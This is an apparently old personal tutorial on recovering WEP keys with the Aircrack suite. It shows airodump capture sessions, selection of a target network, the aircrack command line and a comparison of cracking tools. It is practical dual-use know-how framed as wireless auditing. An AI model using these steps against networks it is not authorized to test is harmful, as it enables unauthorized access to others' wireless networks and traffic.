Wireless WEP crack

Aircrack is a set of tools for auditing wireless networks:

airodump: 802.11 packet capture program

aireplay: 802.11 packet injection program

aircrack: static WEP and WPA-PSK key cracker

airdecap: decrypts WEP/WPA capture files

Wireless Card Installation

1. Download Aircrack from http://100h.org/wlan/aircrack/
2. Read the documentation (README.html) and follow. It has the most comprehensive explanation.
3. I have a CISCO Aironet 350 and PrismGT card (Corega WLCB-54GT) but only CISCO works fine on Windows. PrismGT does not work on Windows. Aironet 350 works for 11b network.

How to capture (airodump)

1. Search WLANs. 0 to hop between channels.

   > airodump.exe
            airodump 2.3 - (C) 2004,2005 Christophe Devine
   
     usage: airodump    
    [ivs only flag]
   
     Known network adapters:
   
     18  Cisco Systems 350 Series PCMCIA Wireless LAN Adapter
      2  Intel(R) PRO/100 VE Network Connection
      3  1394 Net Adapter
   
     Network interface index number  -> 18
   
     Interface types:  'o' = HermesI/Realtek
                       'a' = Aironet/Atheros
   
     Network interface type (o/a)  -> a
   
     Channel(s): 1 to 14, 0 = all  -> 0
   
     (note: if you specify the same output prefix, airodump will resume
      the capture session by appending data to the existing capture file)
   
     Output filename prefix        -> out
   
     (note: to save space and only store the captured WEP IVs, press y.
      The resulting capture file will only be useful for WEP cracking)
   
     Only write WEP IVs (y/n)      -> y

2. From this screen, you select the channel

   BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID
   
    00:0D:0B:98:96:7F   48        2        0  11  54  WEP?  4B18E8C83ABD
    00:A0:B0:40:5C:84   87       13       16   1  54  WEP   HOGE
   
    BSSID              STATION            PWR  Packets  ESSID
   
    00:A0:B0:40:5C:84  00:04:23:52:80:41   86        4  HOGE

3. Press Ctl+c. Next we will capture only channel 1 (ESSID HOGE), and specify only caturing unique WEP IVs. It saves space.

   BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID
   
    00:A0:B0:40:5C:84   87       36       48   1  54  WEP   HOGE
   
    BSSID              STATION            PWR  Packets  ESSID
   
    00:A0:B0:40:5C:84   00:04:23:52:80:41   87       38  HOGE

How to crack (aircrack)

1. Open a new console, and type following command. Aircrack can read the updated file automatically so you can run airodump and aircrack at the same time.

   # aircrack.exe -x -0 out.ivs

2. For 104bit WEP needs about one million IVs. You may need one day or more time to capture the packets. However if you use aireplay by airocrack on Linux and inject, you need only few hours.
3. This is the result. It needed only a quarter a million. Aircrack can also run on Windows but aireplay is not supported though.
   

Note: In my experience, using Aircrack is the best tool compare to others. Aircrack on Linux supports packet injection which means we can increase the traffic, so we need only few hours to capture sufficient packets. Otherwise you will need several days.
Here is other my reports.

Tool	OS	CPU usage	Encryption	802.	NIC Support	Packet injection	My recommendation
Airsnort (note)	Windows	High	WEP	11b?	Few	Not supported	Low
Airsnort (note)	Linux	High	WEP	11b?	Few	Not supported	Low
Aircrack	Windows	Low	WEP, WPA	11a/b/g	Many	Not supported	Mid
Aircrack (note)	Linux	Low	WEP, WPA	11a/b/g	Many	Supported!	Recommended!

---

Back - Support

---

Web www.grape-info.com